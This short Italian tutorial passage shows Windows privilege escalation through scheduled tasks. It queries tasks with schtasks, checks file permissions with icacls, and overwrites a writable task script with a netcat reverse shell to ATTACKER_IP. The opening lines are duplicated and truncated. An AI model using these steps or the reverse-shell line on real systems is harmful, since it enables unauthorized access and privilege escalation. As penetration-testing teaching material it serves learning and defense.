Scheduled tasks
Guardando nelle scheduled tasks nella macchina vittima, puoi vedere delle scheduled tasks che stanno usando un binary che puoi modificare. Le scheduled tasks possono essere visualizzate con il seguen
Guardando nelle scheduled tasks nella macchina vittima, puoi vedere delle scheduled tasks che stanno usando un binary che puoi modificare.
Le scheduled tasks possono essere visualizzate con il seguente comando:
schtasks /query /tn vulntask /fo list /v
Dopo aver lanciato questo comando avremo tante informazioni, ma ciò che interessa a noi è la voce "Task to run" che indica cosa verrà eseguito dalla scheduled task, e la voce "Run as user, che ci indica con quale utente sarà eseguita la task.
Se possiamo modificare il file che verrà eseguito da "Task to run", avremmo possibilità di privilege escalation.
Possiamo controllare se il file è modificabile dal nostro utente con il seguente comando:
icacls directory-di-tasktorun
Nel caso sia modificabile, il comando sarà:
icacls c:\tasks\schtask.bat
Ora possiamo vedere che possiamo modificare il file e quindi inserire un payload di nostra scelta.
Andremo a scaricare (se sulla macchina vittima non c'è) nc64.exe (netcat) dalla nostra macchina con web server python ed una wget.
Dopo andremo a sostituire il contenuto del file che sarà eseguito dalla scheduled task con questo comando:
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat